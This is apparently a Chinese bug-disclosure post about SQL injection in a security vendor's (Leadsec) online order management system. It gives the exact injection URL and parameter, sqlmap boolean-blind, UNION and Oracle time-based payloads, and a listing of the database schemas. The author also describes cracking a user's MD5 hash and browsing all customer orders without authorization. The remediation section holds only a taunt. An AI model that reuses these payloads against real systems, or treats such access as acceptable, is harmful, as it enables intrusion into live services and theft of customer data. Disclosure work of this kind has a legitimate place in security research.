网御星云--一个不安全的安全厂商

网御星云的电子订单管理系统，可以爆sql注入。ORACLE数据库成功列出，随便找了个用户，破了md5加密，进入订单系统，所有订单一览无余。想问问你们，这个真的不重要吗，安全厂商……………………

给你看注入点：

http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800

POST参数：province=11

Place: POST

Parameter: province

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: province=11' AND 7266=7266 AND 'mGhp'='mGhp

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: province=11' UNION ALL SELECT CHR(113)||CHR(102)||CHR(113)||CHR(110)||CHR(113)||CHR(98)||CHR(86)||CHR(103)||CHR(105)||CHR(121)||CHR(109)||CHR(103)||CHR(115)||CHR(108)||CHR(122)||CHR(113)||CHR(122)||CHR(101)||CHR(116)||CHR(113),NULL FROM DUAL--

Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: province=11' AND 6075=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'gnDr'='gnDr

---

[09:21:53] [INFO] the back-end DBMS is Oracle

web application technology: Nginx, JSP

back-end DBMS: Oracle

>>>>>>>>>>>>>>>>>>>DATABASES>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

[*] CTXSYS

[*] DBSNMP

[*] EC_LEADSEC

[*] EC_VENUS

[*] EXFSYS

[*] FLOWS_030000

[*] FLOWS_FILES

[*] HR

[*] IX

[*] MDSYS

[*] OE

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PM

[*] SCOTT

[*] SH

[*] SOAU

[*] SPPROD

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WK_TEST

[*] WKSYS

[*] WMSYS

[*] XDB

修复方案：

你们是安全厂商呀。